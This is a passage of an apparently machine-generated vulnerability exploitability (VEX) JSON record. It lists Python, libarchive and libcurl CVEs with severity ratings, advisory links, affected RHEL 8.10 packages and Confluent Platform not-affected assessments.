            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121,
        125
      ],
      "description": "The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5713"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/15/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19176"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5713"
        },
        {
          "url": "https://bugzilla.redhat.com/2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2458239"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458239"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5713"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19019.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19176"
        },
        {
          "url": "https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67"
        },
        {
          "url": "https://github.com/python/cpython/commit/316f6265b7f9ca4ffed5346b747475ef1943f35d"
        },
        {
          "url": "https://github.com/python/cpython/issues/148178"
        },
        {
          "url": "https://github.com/python/cpython/pull/148187"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-5713.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19176.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5713"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5713"
        }
      ],
      "published": "2026-04-14T16:16:48+00:00",
      "updated": "2026-07-31T14:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5745",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libarchive. A NULL pointer dereference vulnerability exists in the ACL parsing logic, specifically within the archive_acl_from_text_nl() function. When processing a malformed ACL string (such as a bare \"d\" or \"default\" tag without subsequent fields), the function fails to perform adequate validation before advancing the pointer. An attacker can exploit this by providing a maliciously crafted archive, causing an application utilizing the libarchive API (such as bsdtar) to crash, resulting in a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5745"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5745"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455921"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5745"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5745"
        }
      ],
      "published": "2026-04-07T16:16:32+00:00",
      "updated": "2026-06-17T10:59:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5773",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        918
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection for SMB(S)\ntransfers.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a network transfer operation that was requested by an\napplication could wrongfully reuse an existing SMB connection to the same\nserver that was using a different 'share' than the new subsequent transfer\nshould.\n\nThis could in unlucky situations lead to the download of the wrong file or the\nupload of a file to the wrong place. When this happens, the same credentials\nare used and the server name is the same.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5773"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5773"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-rp9q-8q5w-ch44"
        },
        {
          "url": "https://hackerone.com/reports/3650689"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5773"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5773"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
